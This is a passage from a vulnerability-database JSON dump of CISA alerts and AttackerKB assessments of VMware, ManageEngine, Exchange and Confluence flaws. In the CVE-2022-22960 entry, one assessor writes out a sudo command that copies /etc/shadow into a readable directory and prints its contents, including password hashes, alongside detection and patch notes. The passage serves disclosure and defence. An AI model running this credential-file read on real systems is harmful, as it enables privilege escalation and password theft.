products: VMware Workspace ONE Access (Access), VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, vRealize Suite Lifecycle Manager.\n\nThe CSA, [AA22-138B: Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control](<http://www.cisa.gov/uscert/ncas/alerts/aa22-138b>), provides indicators of compromise and detection signatures from CISA as well as trusted third parties to assist administrators with detecting and responding to active exploitation of CVE-2022-22954 and CVE-2022-22960. Malicious cyber actors were able to reverse engineer the vendor updates to develop an exploit within 48 hours and quickly began exploiting these disclosed vulnerabilities in unpatched devices. Based on this activity, CISA expects malicious cyber actors to quickly develop a capability to exploit CVE-2022-22972 and CVE-2022-22973, which were disclosed by VMware on May 18, 2022. \n\n[ED 22-03](<https://www.cisa.gov/emergency-directive-22-03>) directs all Federal Civilian Executive Branch agencies to enumerate all instances of affected VMware products and either deploy updates provided in [VMware Security Advisory VMSA-2022-0014](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>), released May 18, 2022, or remove those instances from agency networks.\n\nCISA strongly encourages all organizations to deploy updates provided in [VMware Security Advisory VMSA-2022-0014](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>) or remove those instances from networks. CISA also encourages organizations with affected VMware products that are accessible from the internet to assume compromise and initiate threat hunting activities using the detection methods provided in [the CSA](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138b>). If potential compromise is detected, administrators should apply the incident response recommendations included in [the CSA](<http://www.cisa.gov/uscert/ncas/alerts/aa22-138b>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/05/18/cisa-issues-emergency-directive-and-releases-advisory-related>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-18T00:00:00", "type": "cisa", "title": "CISA Issues Emergency Directive and Releases Advisory Related to VMware Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-18T00:00:00", "id": "CISA:07834FF4B4F96A051DF8DCF65DA68FF2", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/05/18/cisa-issues-emergency-directive-and-releases-advisory-related", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-26T18:29:35", "description": "On September 16, CISA released [a joint alert ](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>)on exploitation of a vulnerability (CVE-2021-40539) in ManageEngine ADSelfService Plus. On November 8, security researchers from Palo Alto Networks and Microsoft Threat Intelligence Center (MSTIC) released separate reports on targeted attacks against ManageEngine ADSelfService Plus. \n\nCISA encourages organizations to review the indicators of compromise and other technical details in the following reports to uncover any malicious activity within their networks.\n\n * Palo Alto Networks: [Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>)\n * MSTIC: [Threat actor DEV-0322 exploiting ZOHO ManageEngine ADSelfService Plus](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>)\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/11/09/security-researchers-reveal-activity-targeting-manageengine>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-09T00:00:00", "type": "cisa", "title": "Security Researchers Reveal Activity Targeting ManageEngine ADSelfService Plus", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-09T00:00:00", "id": "CISA:2D62C340878780A9844A8FFDFA548783", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/11/09/security-researchers-reveal-activity-targeting-manageengine", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:13:24", "description": "The Federal Bureau of Investigation (FBI), CISA, and Coast Guard Cyber Command (CGCYBER) have released [a Joint Cybersecurity Advisory (CSA)](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) detailing the active exploitation of an authentication bypass vulnerability (CVE-2021-40539) in Zoho ManageEngine ADSelfService Plus\u2014a self-service password management and single sign-on solution. The FBI, CISA, and CGCYBER assess that advanced persistent threat (APT) cyber actors are likely among those exploiting the vulnerability. The exploitation of this vulnerability poses a serious risk to critical infrastructure companies, U.S.-cleared defense contractors, academic institutions, and other entities that use the software.\n\nCISA strongly encourages users and administrators to review [Joint FBI-CISA-CGCYBER CSA: APT Actors Exploiting Newly Identified Vulnerability in ManageEngine ADSelfService Plus](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) and immediately implement the recommended mitigations, which include updating to [ManageEngine ADSelfService Plus build 6114](<https://pitstop.manageengine.com/portal/en/community/topic/adselfservice-plus-6114-security-fix-release>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/16/fbi-cisa-cgcyber-advisory-apt-exploitation-manageengine>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-16T00:00:00", "type": "cisa", "title": "FBI-CISA-CGCYBER Advisory on APT Exploitation of ManageEngine ADSelfService Plus Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-16T00:00:00", "id": "CISA:28BCD901AF6661FE02928495E4D03129", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/16/fbi-cisa-cgcyber-advisory-apt-exploitation-manageengine", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:12:13", "description": "The Federal Bureau of Investigation (FBI), CISA, and Coast Guard Cyber Command (CGCYBER) have updated the [Joint Cybersecurity Advisory (CSA)](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) published on September 16, 2021, which details the active exploitation of an authentication bypass vulnerability (CVE-2021-40539) in Zoho ManageEngine ADSelfService Plus\u2014a self-service password management and single sign-on solution.\n\nThe update provides details on a suite of tools APT actors are using to enable this campaign: \n\n * Dropper: a dropper trojan that drops Godzilla webshell on a system \n * Godzilla: a Chinese language web shell \n * NGLite: a backdoor trojan written in Go \n * KdcSponge: a tool that targets undocumented APIs in Microsoft\u2019s implementation of Kerberos for credential exfiltration \n\nNote: FBI, CISA, and CGCYBER cannot confirm the CVE-2021-40539 is the only vulnerability APT actors are leveraging as part of this activity, so it is key that network defenders focus on detecting the tools listed above in addition to initial access vector.\n\nCISA encourages organizations to review the November 19 update and apply the recommended mitigations. CISA also recommends reviewing the relevant blog posts from [Palo Alto Networks](<https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/>), [Microsoft](<https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/>), and [IBM Security Intelligence](<https://securityintelligence.com/posts/zero-day-discovered-enterprise-help-desk/>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/11/19/updated-apt-exploitation-manageengine-adselfservice-plus>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-19T00:00:00", "type": "cisa", "title": "Updated: APT Exploitation of ManageEngine ADSelfService Plus Vulnerability ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-24T00:00:00", "id": "CISA:906D00DDCD25874F8A28FE348820F80A", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/11/19/updated-apt-exploitation-manageengine-adselfservice-plus", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:14:32", "description": "Zoho has released a security update on a vulnerability (CVE-2021-40539) affecting ManageEngine ADSelfService Plus builds 6113 and below. CVE-2021-40539 has been detected in exploits in the wild. A remote attacker could exploit this vulnerability to take control of an affected system. ManageEngine ADSelfService Plus is a self-service password management and single sign-on solution for Active Directory and cloud apps. Additionally, CISA strongly urges organizations ensure ADSelfService Plus is not directly accessible from the internet.\n\nCISA encourages users and administrators to review the [Zoho advisory](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) for more information and to update to ADSelfService Plus build 6114.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "cisa", "title": "Zoho Releases Security Update for ADSelfService Plus", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-08T00:00:00", "id": "CISA:01AC83B2C29761024423083A8BE9CE80", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/zoho-releases-security-update-adselfservice-plus", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T18:09:54", "description": "On August 25, 2021, Atlassian released security updates to address a remote code execution vulnerability (CVE-2021-26084) affecting Confluence Server and Data Center. Recently, CVE-2021-26084 has been detected in exploits in the wild. A remote attacker could exploit this vulnerability to take control of an affected system.\n\nCISA urges users and administrators to review [Atlassian Security Advisory 2021-08-25](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) and immediately apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-03T00:00:00", "type": "cisa", "title": "Atlassian Releases Security Updates for Confluence Server and Data Center", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-03T00:00:00", "id": "CISA:D7188D434879621A3A83E708590EAE42", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-10-25T18:06:52", "description": "ProxyShell is an exploit chain targeting on-premise installations of Microsoft Exchange Server. It was demonstrated by Orange Tsai at Pwn2Own in April 2021 and is comprised of three CVEs that, when chained, allow a remote unauthenticated attacker to execute arbitrary code on vulnerable targets. The three CVEs are CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.\n\nDetails are available in Orange Tsai\u2019s [Black Hat USA 2020 talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>) and follow-on [blog series](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>). ProxyShell is being broadly exploited in the wild as of August 12, 2021.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at August 12, 2021 9:19pm UTC reported:\n\nCheck out the [Rapid7 analysis](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>) for details on the exploit chain. Seems like a lot of the PoC implementations so far are using admin mailboxes, but I\u2019d imagine folks are going to start finding ways around that soon.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-20T00:00:00", "type": "attackerkb", "title": "ProxyShell Exploit Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T00:00:00", "id": "AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "href": "https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:37:14", "description": "VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at May 02, 2022 10:32pm UTC reported:\n\nWith publicly available information, this was super trivial to exploit! In [the Rapid7 analysis](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis>), I chained it together with what I thought was [CVE-2022-22960](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22960>) (I\u2019m not sure it was anymore) to go from unauthenticated HTTPS access to root very easily.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-06T00:00:00", "type": "attackerkb", "title": "CVE-2022-22954", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22954", "CVE-2022-22960"], "modified": "2022-05-06T00:00:00", "id": "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "href": "https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:37:19", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts. A malicious actor with local access can escalate privileges to \u2018root\u2019.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at May 23, 2022 1:41pm UTC reported:\n\nThere exists a vulnerability within `/usr/local/horizon/scripts/publishCaCert.hzn` where a local attacker can invoke the script to make any file world-readable. The script is intended to facilitate certificate management, allowing cert files to be copied into `/etc/ssl/certs` which is owned by root. The script can be invoked by the `horizon` user without a sudo password.\n\nThe script takes two arguments, the first a path to the file to copy, the second the name of the file to write to the destination. The source path argument can be any file, but the destination is only the final component of the path meaning the file will be placed in `/etc/ssl/certs`.\n\nA local user running as `horizon` (such as from successfully exploiting [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954>)) can exploit this vulnerability to recover the shadow file by executing:\n \n \n horizon [ /tmp ]$ sudo /usr/local/horizon/scripts/publishCaCert.hzn /etc/shadow shadow; cat /etc/ssl/certs/shadow\n root:$6$Y49xfSabYZeOAAKr$VN0QQ5IsF1swmo7PmW7SMwFpdxo.RuN2W1FEc/gF814JhnC/KU.FEBMVxDx5aRclwcfp8OYjFqzqNxtb3hQPz.:19131:0:60:7:::\n bin:x:18964:0:60:7:::\n daemon:x:18964:0:60:7:::\n messagebus:x:18964:0:60:7:::\n systemd-bus-proxy:x:18964:0:60:7:::\n systemd-journal-gateway:x:18964:0:60:7:::\n systemd-journal-remote:x:18964:0:60:7:::\n systemd-journal-upload:x:18964:0:60:7:::\n systemd-network:x:18964:0:60:7:::\n systemd-resolve:x:18964:0:60:7:::\n systemd-timesync:x:18964:0:60:7:::\n nobody:x:18964:0:60:7:::\n sshd:!:18964:0:60:7:::\n rabbitmq:!:18964::60::::\n named:!:18964::60::::\n postgres:!:18964:0:60:7:::\n horizon:!:18964:0:60:7:::\n sshuser:$6$1ppozTLmRlrslppH$8XxgQXUSOc.zUBTOkXFdaNR4Cmd2rPhyioLIQ.fiyvdIlMXGvpOWprt8JTZ12NOP1My2xqJpqewfP/BYLqvul1:18964:0:60:7:::\n elasticsearch:!:18964::60::::\n \n\n# Detection\n\nThe file that is written to the `/etc/ssl/certs` directory will still be owned by root making the attacker unable to delete it. A crafty attacker would backup an existing certificate file or create a new one, leak the file of their choosing and then overwrite it again with a legitimate certificate to remove the evidence of their leaked file. Users should look for files out of place in this directory, and inspect timestamps and the certificate contents to identify potential exploitation attempts of this vulnerability.\n\n# Remediation\n\nVMWare patched this issue with hotfix [HW-154129](<https://kb.vmware.com/s/article/88099>). The patch for the affected script adds validation to ensure that the argument is a certificate file.\n\nDiff:\n \n \n < . /usr/local/horizon/scripts/hzn-bin.inc\n < openssl x509 -noout -in $CERTFILE 2>/dev/null\n < \n < if [ $? -ne 0 ]; then\n < echo \"ERROR: This is not a certificate file\"\n < exit 1\n < fi\n <\n \n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 2Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T00:00:00", "type": "attackerkb", "title": "CVE-2022-22960", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960"], "modified": "2023-10-07T00:00:00", "id": "AKB:959B5BD6-9496-432C-AD1F-DB90CB01C12D", "href": "https://attackerkb.com/topics/E62D0oFo6u/cve-2022-22960", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:36:59", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are from 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.\n\n \n**Recent assessments:** \n \n**noraj** at April 15, 2023 7:34pm UTC reported:\n\nIt\u2019s easy to weaponize, even manually but there are dozens of exploits available. There is a [TryHackMe room](<https://tryhackme.com/room/cve202226134>) about CVE-2022-26134 to practice in a lab environment.\n\n**jbaines-r7** at June 03, 2022 7:21pm UTC reported:\n\nIt\u2019s easy to weaponize, even manually but there are dozens of exploits available. There is a [TryHackMe room](<https://tryhackme.com/room/cve202226134>) about CVE-2022-26134 to practice in a lab environment.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-13T00:00:00", "type": "attackerkb", "title": "CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084", "CVE-2022-26134", "CVE-2022-26314"], "modified": "2022-07-13T00:00:00", "id": "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "href": "https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-10-18T16:42:03", "description": "Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at November 08, 2021 3:18pm UTC reported:\n\nRapid7\u2019s services teams are observing opportunistic exploitation of this vulnerability in the wild. Sounds like coin miners are the payload so far.\n\n**wvu-r7** at September 15, 2021 8:54am UTC reported:\n\nRapid7\u2019s services teams are observing opportunistic exploitation of this vulnerability in the wild. Sounds like coin miners are the payload so far.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": 